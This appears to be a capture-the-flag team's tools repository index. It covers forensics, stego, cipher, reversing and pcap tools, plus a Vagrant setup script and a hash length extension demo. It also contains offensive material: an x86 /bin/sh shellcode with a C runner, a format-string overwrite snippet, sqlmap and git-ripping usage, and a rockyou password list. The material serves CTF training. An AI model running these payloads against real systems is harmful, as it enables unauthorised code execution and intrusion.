├── .gitignore
├── PE tools
│   ├── Ollydbg
│   │   └── README.md
│   ├── PEID
│   │   ├── PEiD-0.95.zip
│   │   └── README.md
│   └── README.md
├── README.md
├── automatic-vagrant-box
│   ├── README.md
│   ├── Vagrantfile
│   └── et_setup.sh
├── cipher
│   ├── README.md
│   └── SCBSolvr.zip
├── debugging
│   └── README.md
├── file-carving
│   ├── 010editor
│   │   └── lookhere
│   ├── README.md
│   ├── binwalk
│   │   └── README.md
│   └── foremost
│       └── README.md
├── forensics
│   ├── README.md
│   ├── detectiteasy
│   │   └── lookhere
│   ├── extundelete
│   │   └── README.md
│   ├── rabin2
│   │   └── use_rabin2_-zz
│   └── radare
│       └── lookhere
├── format-string-vuln
│   └── Readme.md
├── fuzzing
│   └── README.md
├── git
│   ├── README.md
│   └── rip-git
│       └── README.md
├── hash
│   ├── README.md
│   └── hash-length-extension
│       ├── README.md
│       ├── hash_extender
│       │   └── README.md
│       └── hashpump
│           └── README.md
├── password-dictionary
│   └── EN - rockyou.txt.bz2
├── pcap
│   ├── README.md
│   ├── pcapfix
│   │   └── README.md
│   ├── tcpxtract
│   │   └── todo
│   └── xplico
│       └── README.todo
├── port-knocking
│   ├── README.md
│   └── knock
│       └── README.md
├── reversing
│   ├── README.md
│   ├── dex to jar convertor
│   │   ├── README.md
│   │   └── dex2jar-0.0.9.15.zip
│   ├── dex to java decompiler
│   │   └── README.md
│   └── reversing jar
│       ├── README.md
│       └── jd-gui-0.3.5.linux.i686.tar.gz
├── scripting
│   └── expect
├── shell
│   ├── README.md
│   └── shell.py
├── shellcoding
│   ├── check-security-measures
│   ├── remote
│   ├── runner.c
│   └── shellcodes
│       ├── binsh
│       ├── binsh-alpha-mixed
│       ├── binsh-alpha-upper
│       └── binsh-shikata-ga-nai
├── sql-injection
│   ├── README.md
│   └── sqlmap
│       ├── README.md
│       └── sqlmapproject-sqlmap-97cc679.tar.gz
├── stego
│   ├── README.md
│   ├── soundvis
│   │   └── SoundVisualizer
│   ├── steganabara
│   │   ├── README.md
│   │   └── steganabara-1.1.1.jar
│   ├── steghide
│   │   └── README.md
│   └── stegsolve
│       ├── README.md
│       └── Stegsolve.jar
├── template
│   └── README.md
└── xss
    └── README.md

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
```
# Created by https://www.gitignore.io/api/linux

### Linux ###
*~

# KDE directory preferences
.directory

# Linux trash folder which might appear on any partition or disk
.Trash-*
```
--------------------------------------------------------------------------------
/PE tools/Ollydbg/README.md:
--------------------------------------------------------------------------------
OLLYDBG
=======

[OllyDbg](http://www.ollydbg.de/) is a 32-bit assembler-level analysing debugger for Microsoft Windows.

--------------------------------------------------------------------------------
/PE tools/PEID/PEiD-0.95.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/PE tools/PEID/PEiD-0.95.zip
--------------------------------------------------------------------------------
/PE tools/PEID/README.md:
--------------------------------------------------------------------------------
PEiD
====

Probably the most useful tool is [PEiD](PEiD-0.95.zip), which detects the most common packers, cryptors and compilers for PE files.
--------------------------------------------------------------------------------
/PE tools/README.md:
--------------------------------------------------------------------------------
PETOOLS
=======

Herein lie the tools for the analysis of the PE file format.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Team Colonel Panic Tools
========================

Herein lie the tools that Team Colonel Panic uses (or should be using) frequently but that don't come pre-installed.

Another cool repo to look into is [zardus/ctf-tools](https://github.com/zardus/ctf-tools/). It also includes installers for all the tools and is actually quite awesome.
--------------------------------------------------------------------------------
/automatic-vagrant-box/README.md:
--------------------------------------------------------------------------------
EpicTreasure - Batteries included CTF Vagrant box
=================================================

Taken from [here](https://github.com/thebarbershopper/epictreasure).

Vagrantfile and et_setup.sh copied on 14 Dec 2015.

Tools included
--------------

+ Binjitsu
+ Pwndbg
+ Radare2
+ Firmware tools (fmk / qemu)
+ Angr
--------------------------------------------------------------------------------
/automatic-vagrant-box/Vagrantfile:
--------------------------------------------------------------------------------
```ruby
# -*- mode: ruby -*-
# vi: set ft=ruby :

Vagrant.configure("2") do |config|
  config.vm.box = "trusty64"
  config.vm.box_url = "http://cloud-images.ubuntu.com/vagrant/trusty/current/trusty-server-cloudimg-amd64-vagrant-disk1.box"
  # The provisioning script runs as the unprivileged vagrant user
  config.vm.provision :shell, :path => "et_setup.sh", :privileged => false
  config.ssh.username = 'vagrant'
  config.ssh.forward_agent = true

  config.vm.synced_folder "host-share", "/home/vagrant/host-share"

  config.vm.provider "virtualbox" do |vb|
    vb.customize ["modifyvm", :id, "--memory", "2048"]
  end
end
```
--------------------------------------------------------------------------------
/automatic-vagrant-box/et_setup.sh:
--------------------------------------------------------------------------------
```bash
#!/bin/bash

# Updates
sudo apt-get -y update
sudo apt-get -y upgrade

sudo apt-get -y install python3-pip
sudo apt-get -y install tmux
sudo apt-get -y install gdb gdb-multiarch
sudo apt-get -y install unzip
sudo apt-get -y install foremost
sudo apt-get -y install ipython

# QEMU with MIPS/ARM - http://reverseengineering.stackexchange.com/questions/8829/cross-debugging-for-mips-elf-with-qemu-toolchain
sudo apt-get -y install qemu qemu-user qemu-user-static
sudo apt-get -y install 'binfmt*'
sudo apt-get -y install libc6-armhf-armel-cross
sudo apt-get -y install debian-keyring
sudo apt-get -y install debian-archive-keyring
sudo apt-get -y install emdebian-archive-keyring
# The provisioner runs unprivileged (see Vagrantfile), so writes under /etc need sudo
sudo tee /etc/apt/sources.list.d/emdebian.list << EOF
deb http://mirrors.mit.edu/debian squeeze main
deb http://www.emdebian.org/debian squeeze main
EOF
sudo apt-get -y install libc6-mipsel-cross
sudo apt-get -y install libc6-arm-cross
sudo mkdir /etc/qemu-binfmt
sudo ln -s /usr/mipsel-linux-gnu /etc/qemu-binfmt/mipsel
sudo ln -s /usr/arm-linux-gnueabihf /etc/qemu-binfmt/arm
sudo rm /etc/apt/sources.list.d/emdebian.list
sudo apt-get update

# Install Binjitsu
sudo apt-get -y install python2.7 python-pip python-dev git
sudo pip install --upgrade git+https://github.com/binjitsu/binjitsu.git

cd
mkdir tools
cd tools

# Install pwndbg
git clone https://github.com/zachriggle/pwndbg
echo source `pwd`/pwndbg/gdbinit.py >> ~/.gdbinit

# Capstone for pwndbg
git clone https://github.com/aquynh/capstone
cd capstone
git checkout -t origin/next
sudo ./make.sh install
cd bindings/python
sudo python3 setup.py install # Ubuntu 14.04+, GDB uses Python3

# pycparser for pwndbg
sudo pip3 install pycparser # Use pip3 for Python3

# Install radare2 (back in ~/tools, not inside the capstone checkout)
cd ~/tools
git clone https://github.com/radare/radare2
cd radare2
./sys/install.sh

# Install binwalk
cd
git clone https://github.com/devttys0/binwalk
cd binwalk
sudo python setup.py install

# Install Firmware-Mod-Kit
sudo apt-get -y install git build-essential zlib1g-dev liblzma-dev python-magic
cd ~/tools
wget https://firmware-mod-kit.googlecode.com/files/fmk_099.tar.gz
tar xvf fmk_099.tar.gz
rm fmk_099.tar.gz
cd fmk_099/src
./configure
make

# Uninstall capstone
sudo pip2 uninstall capstone -y

# Install correct capstone
cd ~/tools/capstone/bindings/python
sudo python setup.py install

# Personal config
sudo apt-get -y install stow
cd /home/vagrant
rm .bashrc
git clone https://github.com/thebarbershopper/dotfiles
cd dotfiles
./install.sh

# Install Angr
cd /home/vagrant
sudo apt-get -y install python-dev libffi-dev build-essential virtualenvwrapper
sudo pip install virtualenv
virtualenv angr
source angr/bin/activate
pip install angr --upgrade

# Install 32 bit libs
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get -y install libc6:i386 libncurses5:i386 libstdc++6:i386
```
--------------------------------------------------------------------------------
/cipher/README.md:
--------------------------------------------------------------------------------
Cipher Tools
============

Herein lie the tools that can be used whenever ciphers are involved.

Tools in this repo
------------------

+ [SCBSolvr](SCBSolvr.zip) for breaking monoalphabetic substitution ciphers

Other links
-----------

+ [YASME-Tim Crypto Tools](https://github.com/YASME-Tim/crypto-tools) contains
    + [Finding coding/hashing scheme](https://github.com/YASME-Tim/crypto-tools/tree/master/find-coding-scheme)
    + [One Time Pad](https://github.com/YASME-Tim/crypto-tools/tree/master/otp)
    + [Poem Code Cipher](https://github.com/YASME-Tim/crypto-tools/tree/master/poemcode)
    + [Caesar Cipher Bruteforce](https://github.com/YASME-Tim/crypto-tools/tree/master/rot)
    + [Phone Keypad - HandyCode](https://github.com/YASME-Tim/crypto-tools/tree/master/handycode)
+ [CRYPTOOL](https://www.cryptool.org/en/)
+ [Rumkin Cipher Tools](http://rumkin.com/tools/cipher/)
+ [CryptoCrack](https://sites.google.com/site/cryptocrackprogram/)
+ [quipqiup](http://www.quipqiup.com/) - A fast and automated cryptogram solver. Has two modes (trusting spaces, and finding spaces).
+ [f00l Vigenere Cracker](http://f00l.de/hacking/vigenere.php) - Helps crack Vigenère ciphers. Not very customizable, however.
+ `zbar-tools` for decoding barcodes and QR codes (installed using `apt-get`)
+ [yafu](http://sourceforge.net/projects/yafu/) - Automated integer factorization
+ [rsa-tool](https://github.com/ius/rsatool) - rsatool can be used to calculate RSA and RSA-CRT parameters
--------------------------------------------------------------------------------
/cipher/SCBSolvr.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/cipher/SCBSolvr.zip
--------------------------------------------------------------------------------
/debugging/README.md:
--------------------------------------------------------------------------------
Debugging
=========

It is quite painful when addresses differ between a run under the debugger and a run outside it. To fix this, there is [fixenv by hellman](https://github.com/hellman/fixenv).

Visualize heap operations with [villoc](https://github.com/wapiflapi/villoc).

Debug nicely using [PEDA](https://github.com/longld/peda) or [pwndbg](https://github.com/zachriggle/pwndbg).
--------------------------------------------------------------------------------
/file-carving/010editor/lookhere:
--------------------------------------------------------------------------------
http://www.sweetscape.com/010editor/
--------------------------------------------------------------------------------
/file-carving/README.md:
--------------------------------------------------------------------------------
File Carving Tools
==================

Herein lie the tools that can be used to carve data of a specific format out of a given file.
--------------------------------------------------------------------------------
/file-carving/binwalk/README.md:
--------------------------------------------------------------------------------
binwalk
=======

[binwalk](https://github.com/devttys0/binwalk) can be used for analyzing, reverse engineering, and extracting firmware images.

```
binwalk --options inputfilename
```

Note: Installable using `apt-get`

Reference usage
---------------

[DEFKTHON CTF:Reversing](https://github.com/ctfs/write-ups-2014/blob/master/defkthon-ctf/reversing-400/README.md)
--------------------------------------------------------------------------------
/file-carving/foremost/README.md:
--------------------------------------------------------------------------------
foremost
========

[foremost](https://github.com/jonstewart/foremost) can be used to recover files using their headers, footers, and data structures.

```
foremost --options -i inputfilename -o outputdir
```

Note: Installable using `apt-get`

Reference usage
---------------

[DEFCON-CTF-QUALS-FORENSIC](http://jekil.sexy/forensic/defcon-18-ctf-quals-forensic-100-writeup)
--------------------------------------------------------------------------------
/forensics/README.md:
--------------------------------------------------------------------------------
FORENSIC TOOLS
==============

Herein lie the tools that can be used to do forensic analysis.
--------------------------------------------------------------------------------
/forensics/detectiteasy/lookhere:
--------------------------------------------------------------------------------
http://ntinfo.biz/
--------------------------------------------------------------------------------
/forensics/extundelete/README.md:
--------------------------------------------------------------------------------
EXTUNDELETE
===========

[Extundelete](http://extundelete.sourceforge.net/) is a utility that can recover deleted files from an ext3 or ext4 partition.

Example usage:

```
extundelete [options] device-file
```

Note: directly installable from your package manager.

Reference usage
---------------

[TODO / QName](writeupurl)
--------------------------------------------------------------------------------
/forensics/rabin2/use_rabin2_-zz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/forensics/rabin2/use_rabin2_-zz
--------------------------------------------------------------------------------
/forensics/radare/lookhere:
--------------------------------------------------------------------------------
http://reverseengineering.stackexchange.com/questions/5926/what-linux-software-can-i-use-to-explore-entropy-of-a-file
--------------------------------------------------------------------------------
/format-string-vuln/Readme.md:
--------------------------------------------------------------------------------
Format String Vuln
==================

Probably the easiest tool to use turns out to be [libformatstr](https://github.com/hellman/libformatstr).

Install using `sudo pip install libformatstr`.

Most common usage:

```python
from libformatstr import FormatStr

addr = 0xdeadbeef
system_addr = 0xcafebabe

p = FormatStr()
p[addr] = system_addr

# buf is 14th argument, 4 bytes are already printed
print repr( p.payload(14, start_len=4) )
```
--------------------------------------------------------------------------------
/fuzzing/README.md:
--------------------------------------------------------------------------------
Fuzzing
-------

Really worth trying out the tool [AFL](http://lcamtuf.coredump.cx/afl/). A simple, easy way to fuzz things: `./afl-gcc` to compile, `./afl-fuzz` to fuzz, and `./afl-tmin` to minimise crashing test cases so they are easier to understand.
--------------------------------------------------------------------------------
/git/README.md:
--------------------------------------------------------------------------------
Git Tools
=========

Herein lie the tools that can be used whenever git repositories are involved.
--------------------------------------------------------------------------------
/git/rip-git/README.md:
--------------------------------------------------------------------------------
rip-git
=======

[rip-git](https://github.com/kost/dvcs-ripper/blob/master/rip-git.pl) can be used as follows to retrieve a git repository from a `.git` folder exposed online.

```
perl ./rip-git.pl -v -u http://www.example.com/.git/
```

Reference usage
---------------

[9447 CTF 2014 / Tumorous](https://github.com/ctfs/write-ups-2014/tree/master/9447-ctf-2014/tumorous)
--------------------------------------------------------------------------------
/hash/README.md:
--------------------------------------------------------------------------------
Hash Tools
==========

Herein lie the tools that can be used whenever hashes are involved.
--------------------------------------------------------------------------------
/hash/hash-length-extension/README.md:
--------------------------------------------------------------------------------
Hash Length Extension
---------------------

Hash length extension attacks apply when certain types of hashes are misused as message authentication codes: an attacker who knows a valid hash for a message can append extra information to that message and produce a valid hash for the result.

Read more on [Wikipedia](https://en.wikipedia.org/wiki/Length_extension_attack)
--------------------------------------------------------------------------------
/hash/hash-length-extension/hash_extender/README.md:
--------------------------------------------------------------------------------
Hash Extender
=============

[hash_extender](https://github.com/iagox86/hash_extender) can be used to exploit the hash length extension attack in various hashing algorithms.

Reference usage
---------------

[Skull Security Blog Post](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks), which is basically the same as the GitHub readme for this tool, but in a more nicely viewable format.
--------------------------------------------------------------------------------
/hash/hash-length-extension/hashpump/README.md:
--------------------------------------------------------------------------------
HashPump
========

[hashpump](https://github.com/bwall/HashPump) can be used to exploit the hash length extension attack in various hashing algorithms.

Reference usage
---------------

[Plaid CTF 2014 / mtpox](https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/mtpox)

PS: It might be better to use [hash_extender](https://github.com/TeamColonelPanic/tools/tree/master/hash/hash-length-extension/hash_extender) instead when you want the output in HTML format, for example.
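As an added illustration of the weakness that hash_extender and HashPump automate (this example is not part of the repo or of either tool): a tag computed as `SHA1(secret || message)` can be resumed from its digest, so an appended message verifies without the secret, while an HMAC tag cannot be resumed. The SHA-1 below is a stand-alone implementation that accepts a starting state; the secret and messages are constructed for the demo.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _sha1_compress(state, block):
    """One SHA-1 compression of a 64-byte block into the running state."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        tmp = (_rotl(a, 5) + (f & MASK32) + e + k + w[i]) & MASK32
        a, b, c, d, e = tmp, a, _rotl(b, 30), c, d
    return tuple((s + v) & MASK32 for s, v in zip(state, (a, b, c, d, e)))


def md_padding(msg_len):
    """Padding SHA-1 appends to a msg_len-byte message: 0x80, zeros up to
    56 mod 64, then the bit length as a 64-bit big-endian integer."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def sha1(data, state=SHA1_IV, prior_len=0):
    """SHA-1 of data. A state recovered from an existing digest plus prior_len
    (bytes already absorbed, a multiple of 64) continues that hash; this
    resumability is the whole length-extension problem."""
    padded = data + md_padding(prior_len + len(data))
    for off in range(0, len(padded), 64):
        state = _sha1_compress(state, padded[off:off + 64])
    return struct.pack(">5I", *state)


def matches_hashlib(data):
    """Self-check: the implementation above agrees with hashlib on data."""
    return sha1(data) == hashlib.sha1(data).digest()


# The broken construction: tag = SHA1(secret || message).
def weak_tag(secret, msg):
    return hashlib.sha1(secret + msg).digest()


def weak_verify(secret, msg, tag):
    return hmac.compare_digest(weak_tag(secret, msg), tag)


# The fix: HMAC's outer hash hides the inner state, so a tag cannot be resumed.
def hmac_tag(secret, msg):
    return hmac.new(secret, msg, hashlib.sha1).digest()


def hmac_verify(secret, msg, tag):
    return hmac.compare_digest(hmac_tag(secret, msg), tag)


def extend(tag, known_msg, secret_len, extension):
    """What hash_extender/HashPump compute: from a tag over secret||known_msg
    and only the secret's length, build message' = known_msg||glue||extension
    and the tag for secret||message' without ever seeing the secret."""
    glue = md_padding(secret_len + len(known_msg))
    absorbed = secret_len + len(known_msg) + len(glue)  # a multiple of 64
    state = struct.unpack(">5I", tag)
    return known_msg + glue + extension, sha1(extension, state, absorbed)


def demo():
    secret = b"server-side-secret"   # constructed; only its length is used by extend()
    msg = b"user=alice&role=user"    # constructed
    ext = b"&role=admin"             # constructed
    forged_msg, forged_tag = extend(weak_tag(secret, msg), msg, len(secret), ext)
    # The same trick applied to an HMAC tag yields a tag that does not verify.
    hm_msg, hm_tag = extend(hmac_tag(secret, msg), msg, len(secret), ext)
    return {
        "weak_accepts_forgery": weak_verify(secret, forged_msg, forged_tag),
        "hmac_accepts_forgery": hmac_verify(secret, hm_msg, hm_tag),
    }


if __name__ == "__main__":
    print(demo())
```

The verifier's fix is the HMAC half of the block: any construction whose tag is a raw Merkle-Damgård digest over a secret prefix has the same problem.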

--------------------------------------------------------------------------------
/password-dictionary/EN - rockyou.txt.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/password-dictionary/EN - rockyou.txt.bz2
--------------------------------------------------------------------------------
/pcap/README.md:
--------------------------------------------------------------------------------
Pcap Tools
==========

Herein lie the tools that can be used whenever pcap files are involved.
--------------------------------------------------------------------------------
/pcap/pcapfix/README.md:
--------------------------------------------------------------------------------
pcapfix
=======

[pcapfix](https://github.com/Rup0rt/pcapfix) can be used to repair a broken pcap file so that it can be opened in Wireshark.

```
pcapfix --outfile outputfilename --verbose inputfilename
```

Note: Installable using `apt-get`

Reference usage
---------------

[ASIS CTF 2014 Quals / Forensic](https://github.com/ctfs/write-ups-2014/tree/master/asis-ctf-quals-2014/forensic)
--------------------------------------------------------------------------------
/pcap/tcpxtract/todo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/pcap/tcpxtract/todo
--------------------------------------------------------------------------------
/pcap/xplico/README.todo:
--------------------------------------------------------------------------------
http://www.xplico.org/download
--------------------------------------------------------------------------------
/port-knocking/README.md:
--------------------------------------------------------------------------------
Port Knocking Tools
===================

Herein lie the tools that can be used whenever port knocking is required.
--------------------------------------------------------------------------------
/port-knocking/knock/README.md:
--------------------------------------------------------------------------------
knock
=====

[knock](http://www.zeroflux.org/projects/knock) can be used to do port knocking. Read the reference write-up to understand more.

Reference usage
---------------

[ASIS CTF 2014 Quals / Toq-Toq](https://github.com/ctfs/write-ups-2014/tree/master/asis-ctf-quals-2014/toq-toq)
--------------------------------------------------------------------------------
/reversing/README.md:
--------------------------------------------------------------------------------
Reversing Tools
===============

Herein lie the tools that can be used whenever reverse engineering is needed.
--------------------------------------------------------------------------------
/reversing/dex to jar convertor/README.md:
--------------------------------------------------------------------------------
DEX to JAR converter
====================

[DEX to JAR Converter](dex2jar-0.0.9.15.zip) can be used to work with Android .dex and Java .class files.

```
Usage: run dextojar.sh file.
```

NOTE: can also be downloaded at [https://code.google.com/p/dex2jar/](https://code.google.com/p/dex2jar/)

Reference usage
---------------

[TODO / QName](writeupurl)
--------------------------------------------------------------------------------
/reversing/dex to jar convertor/dex2jar-0.0.9.15.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/reversing/dex to jar convertor/dex2jar-0.0.9.15.zip
--------------------------------------------------------------------------------
/reversing/dex to java decompiler/README.md:
--------------------------------------------------------------------------------
DEX to Java Decompiler
======================

[DEX to Java Decompiler (jadx)](https://github.com/skylot/jadx) can be used to produce Java source code from Android Dex and Apk files.

It is both a command line and a GUI tool.

```
TODO
```

Reference usage
---------------

[Pragyan CTF 2015 / Hackerz](https://github.com/ctfs/write-ups-2015/tree/master/pragyan-ctf-2015/android/hackerz)
--------------------------------------------------------------------------------
/reversing/reversing jar/README.md:
--------------------------------------------------------------------------------
Java Decompiler
===============

[Java Decompiler](jd-gui-0.3.5.linux.i686.tar.gz) can be used to decompile .jar files in a user-friendly GUI.

Note: A more recent, updated version can also be downloaded at [http://jd.benow.ca/](http://jd.benow.ca/)

Reference usage
---------------

[TODO / QName](writeupurl)
--------------------------------------------------------------------------------
/reversing/reversing jar/jd-gui-0.3.5.linux.i686.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/reversing/reversing jar/jd-gui-0.3.5.linux.i686.tar.gz
--------------------------------------------------------------------------------
/scripting/expect:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/scripting/expect
--------------------------------------------------------------------------------
/shell/README.md:
--------------------------------------------------------------------------------
Interactive Shell
=================

Sometimes you just need to escape some strings and use them in a shell. Escaping them by hand is a pain, so it is better to use a small shell-escaping script.

Usage
-----

Run `python` (Python 2; the script uses `has_key` and print statements) in a directory that contains `shell.py` and enter the following:

```python
import shell
while True:
    print "Input string >>>",
    x = raw_input()
    print " ", shell.quote(x)
    print ""
```

Then any string you give as input is quoted nicely and returned to you.
--------------------------------------------------------------------------------
/shell/shell.py:
--------------------------------------------------------------------------------
```python
#! /usr/bin/env python
######################################################################
# Written by Kevin L. Sitze on 2006-12-03
# This code may be used pursuant to the MIT License.
######################################################################
# Python 2 module: uses dict.has_key and the print statement.

import re

__all__ = ( 'quote', )

# Words bash treats specially when they appear as a bare command word.
_bash_reserved_words = {
    'case' : True,
    'coproc' : True,
    'do' : True,
    'done' : True,
    'elif' : True,
    'else' : True,
    'esac' : True,
    'fi' : True,
    'for' : True,
    'function' : True,
    'if' : True,
    'in' : True,
    'select' : True,
    'then' : True,
    'until' : True,
    'while' : True,
    'time' : True
}

####
# _quote_re1 escapes double-quoted special characters.
# _quote_re2 escapes unquoted special characters.

_quote_re1 = re.compile( r"([\!\"\$\\\`])" )
_quote_re2 = re.compile( r"([\t\ \!\"\#\$\&\'\(\)\*\:\;\<\>\?\@\[\\\]\^\`\{\|\}\~])" )

def quote( *args ):
    """Combine the arguments into a single string and escape any and
    all shell special characters or (reserved) words.  The shortest
    possible string (correctly quoted suited to pass to a bash shell)
    is returned.
    """
    s = "".join( args )
    if _bash_reserved_words.has_key( s ):
        return "\\" + s
    elif s.find( '\'' ) >= 0:
        # A single quote inside the string rules out single-quoting it,
        # so double-quote and escape the characters bash expands there.
        s1 = '"' + _quote_re1.sub( r"\\\1", s ) + '"'
    else:
        s1 = "'" + s + "'"
    # Alternative: no surrounding quotes, backslash every special character.
    s2 = _quote_re2.sub( r"\\\1", s )
    if len( s1 ) <= len( s2 ):
        return s1
    else:
        return s2

if __name__ == '__main__':

    import sys
    import traceback
    from types import FloatType, ComplexType

    def assertEquals( exp, got ):
        """assertEquals( exp, got )

        Two objects test as "equal" if:

        * they are the same object as tested by the 'is' operator.
        * either object is a float or complex number and the absolute
          value of the difference between the two is less than 1e-8.
        * applying the equals operator ('==') returns True.
        """
        if exp is got:
            r = True
        elif ( type( exp ) in ( FloatType, ComplexType ) or
               type( got ) in ( FloatType, ComplexType ) ):
            r = abs( exp - got ) < 1e-8
        else:
            r = ( exp == got )
        if not r:
            print >>sys.stderr, "Error: expected <%s> but got <%s>" % ( repr( exp ), repr( got ) )
            traceback.print_stack()

    for word in _bash_reserved_words:
        assertEquals( "\\" + word, quote( word ) )

    for char in ( '\t',
                  ' ', '!', '"', '#',
                  '$', '&', "'", '(',
                  ')', '*', ':', ';',
                  '<', '>', '?', '@',
                  '[', ']', '^', '`',
                  '{', '|', '}', '~' ):
        assertEquals( "\\" + char, quote( char ) )

    assertEquals( "'this is a simple path with spaces'",
                  quote( 'this is a simple path with spaces' ) )
    assertEquals( "don\\'t", quote( "don't" ) )
    assertEquals( '"don\'t do it"', quote( "don't do it" ) )
```
--------------------------------------------------------------------------------
/shellcoding/check-security-measures:
--------------------------------------------------------------------------------
https://github.com/slimm609/checksec.sh
--------------------------------------------------------------------------------
/shellcoding/remote:
--------------------------------------------------------------------------------
pwntools / binjitsu =====> Read http://capturetheswag.blogspot.com.au/2015/03/vancouver-bsides-2015-sushi-pwnable.html
--------------------------------------------------------------------------------
/shellcoding/runner.c:
--------------------------------------------------------------------------------
```c
/* Minimal shellcode test harness: paste the bytes into `code` as a C string. */
unsigned char code[] = "/*Shellcode here*/";

int main(int argc, char **argv)
{
    int (*func)();
    /* Cast the byte array to a function pointer and jump into it. `code`
       lives in the data segment, which modern toolchains map non-executable,
       so the call faults unless the binary is built with that segment
       executable. */
    func = (int (*)()) code;
    (*func)();
    return 0;
}
```
--------------------------------------------------------------------------------
/shellcoding/shellcodes/binsh:
--------------------------------------------------------------------------------
```python
buf = '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
```
--------------------------------------------------------------------------------
/shellcoding/shellcodes/binsh-alpha-mixed:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/shellcoding/shellcodes/binsh-alpha-upper:
--------------------------------------------------------------------------------
```python
# 111 bytes
```
--------------------------------------------------------------------------------
/shellcoding/shellcodes/binsh-shikata-ga-nai:
--------------------------------------------------------------------------------
```python
#48
```
--------------------------------------------------------------------------------
/sql-injection/README.md:
--------------------------------------------------------------------------------
SQL-Injection Tools
===================

Herein lie the tools that can be used whenever there is a possibility of SQL injection.
--------------------------------------------------------------------------------
/sql-injection/sqlmap/README.md:
--------------------------------------------------------------------------------
Sqlmap
======

[Sqlmap](https://github.com/sqlmapproject/sqlmap) can be used to perform SQL injection when you are not in the mood for writing long queries.

```
./sqlmap.py -h
```

to see the available operations.
11 | 12 | Reference usage 13 | --------------- 14 | 15 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /sql-injection/sqlmap/sqlmapproject-sqlmap-97cc679.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/sql-injection/sqlmap/sqlmapproject-sqlmap-97cc679.tar.gz -------------------------------------------------------------------------------- /stego/README.md: -------------------------------------------------------------------------------- 1 | Stego Tools 2 | =========== 3 | 4 | Herein lie the tools that can be used whenever stego is involved. 5 | -------------------------------------------------------------------------------- /stego/soundvis/SoundVisualizer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/stego/soundvis/SoundVisualizer -------------------------------------------------------------------------------- /stego/steganabara/README.md: -------------------------------------------------------------------------------- 1 | Steganabara 2 | =========== 3 | 4 | [Steganabara](steganabara-1.1.1.jar) can be used to view an image's individual colour channels and bit planes, to run histogram analysis, and to apply other filters that make hidden structure visible. 
5 | 6 | Reference usage 7 | --------------- 8 | 9 | [ASIS CTF 2014 Quals / White noise](http://quangntenemy.blogspot.de/2014/05/asis-ctf-quals-2014.html) -------------------------------------------------------------------------------- /stego/steganabara/steganabara-1.1.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/stego/steganabara/steganabara-1.1.1.jar -------------------------------------------------------------------------------- /stego/steghide/README.md: -------------------------------------------------------------------------------- 1 | Steghide 2 | ======== 3 | 4 | [Steghide](http://steghide.sourceforge.net/) can be used to hide data in, and extract it from, JPEG, BMP, WAV and AU files. Embedding and extraction are tied to a passphrase (asked for interactively, or given with `-p`). 5 | 6 | ``` 7 | # hide / embed: put secret.txt into the cover file picture.jpg 8 | steghide embed -cf picture.jpg -ef secret.txt 9 | 10 | # extract: with the correct passphrase, the original secret.txt is written to the current directory 11 | steghide extract -sf picture.jpg 12 | 13 | # inspect a file that may contain embedded data before extracting it (capacity; with the passphrase, also the embedded file's name and size) 14 | steghide info received_file.wav 15 | ``` 16 | 17 | Reference usage 18 | --------------- 19 | 20 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /stego/stegsolve/README.md: -------------------------------------------------------------------------------- 1 | Stegsolve 2 | ========= 3 | 4 | [Stegsolve](Stegsolve.jar) can be used to step through an image's colour channels and bit planes one at a time (plus XOR, inverse and other filters), browse animation frames, and combine two images. 
